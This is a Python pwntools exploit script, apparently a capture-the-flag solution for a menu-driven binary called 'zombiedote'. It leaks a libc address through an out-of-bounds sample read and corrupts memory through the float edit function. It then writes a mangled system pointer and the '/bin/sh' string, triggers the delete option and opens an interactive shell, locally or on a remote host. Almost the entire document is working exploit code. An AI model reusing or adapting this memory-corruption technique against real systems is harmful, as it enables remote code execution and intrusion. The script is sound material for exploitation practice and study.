#!/usr/bin/env python3
from pwn import context, ELF, p64, remote, sys, u64
from struct import pack, unpack
from typing import List
# Load the target binary and make it pwntools' default context (arch/OS/endianness
# for p64/u64 below); the libc copy is loaded only for symbol lookups, so its
# checksec report is skipped.
context.binary = elf = ELF('zombiedote')
glibc = ELF('glibc/libc.so.6', checksec=False)
def get_process():
    """Return the tube to interact with.

    With no command-line argument the binary is run locally; otherwise the
    first argument is interpreted as ``host:port`` and a remote connection
    is opened instead.
    """
    if len(sys.argv) != 1:
        # Remote mode: a single "host:port" argument selects the target.
        host, port = sys.argv[1].split(':')
        return remote(host, port)
    return elf.process()
def create(number: int):
    """Select menu option 1 and answer the size prompt with `number`.

    Uses the module-level tube `p`.
    """
    menu_prompt = b'>> '
    p.sendlineafter(menu_prompt, b'1')
    p.sendlineafter(b'Number of samples: ', f'{number}'.encode())
def insert(samples: List[float]):
    """Select menu option 2, announce how many values follow, then send each one.

    Each value is sent as its ``str()`` form in reply to the ``(%): `` prompt.
    Uses the module-level tube `p`.
    """
    count = len(samples)
    p.sendlineafter(b'>> ', b'2')
    p.sendlineafter(b'Number of samples tested: ', f'{count}'.encode())
    for value in samples:
        p.sendlineafter(b'(%): ', f'{value}'.encode())
def delete():
    """Select menu option 3 on the module-level tube `p`.

    Only the menu choice is sent; the option takes no further input here.
    """
    choice = b'3'
    p.sendlineafter(b'>> ', choice)
def edit(number: int, sample: float):
    """Select menu option 4 and overwrite sample `number` with `sample`.

    Both values are sent as their ``str()`` form. Uses the module-level tube `p`.
    """
    # (prompt, reply) pairs in the order the program asks for them.
    dialogue = (
        (b'>> ', b'4'),
        (b'Enter sample number: ', str(number).encode()),
        (b'(%): ', str(sample).encode()),
    )
    for prompt, reply in dialogue:
        p.sendlineafter(prompt, reply)
def inspect(number: int) -> float:
    """Select menu option 5 and return sample `number` as printed by the program.

    The value is taken from the line following the ``(%): `` prompt and parsed
    with ``float()``; a non-numeric reply raises ``ValueError``. Uses the
    module-level tube `p`.
    """
    p.sendlineafter(b'>> ', b'5')
    p.sendlineafter(b'Enter sample number to inspect: ', str(number).encode())
    p.recvuntil(b'(%): ')
    printed = p.recvline().decode()
    return float(printed)
def main():
    """Drive the menu on the module-level tube `p`, then hand the session over.

    The statement order and the literal indices/offsets below are specific to
    this binary and libc build; nothing here is derivable from the script alone,
    so the comments only describe what each line visibly does.
    """
    create(17000)
    # inspect() returns a float; its 8-byte IEEE-754 encoding is reinterpreted
    # as a u64 and the symbol's offset is subtracted to obtain the libc base.
    # NOTE(review): the index 329732 exceeds the 17000 samples created above —
    # presumably an out-of-bounds read; confirm against the binary.
    glibc.address = u64(pack('d', inspect(329732))) - glibc.sym.__GI__dl_catch_error
    p.success(f'Glibc base address: {hex(glibc.address)}')
    # Fixed distance from the libc base; its meaning is not recoverable here —
    # presumably specific to this libc build/mapping layout, verify before reuse.
    mmap_chunk = glibc.address - 0x24ff0
    # Addresses are written via the float-input path, so each u64 is first
    # reinterpreted as a double (inverse of the pack/u64 step above).
    edit(17627, unpack('d', p64(mmap_chunk))[0])
    edit(17644, 0)
    insert([
        unpack('d', p64(glibc.sym.system << 17))[0],
        unpack('d', p64(next(glibc.search(b'/bin/sh'))))[0],
    ])
    delete()
    p.interactive()
if __name__ == '__main__':
    # `p` is the global tube every helper above sends to; it must exist before main().
    p = get_process()
    main()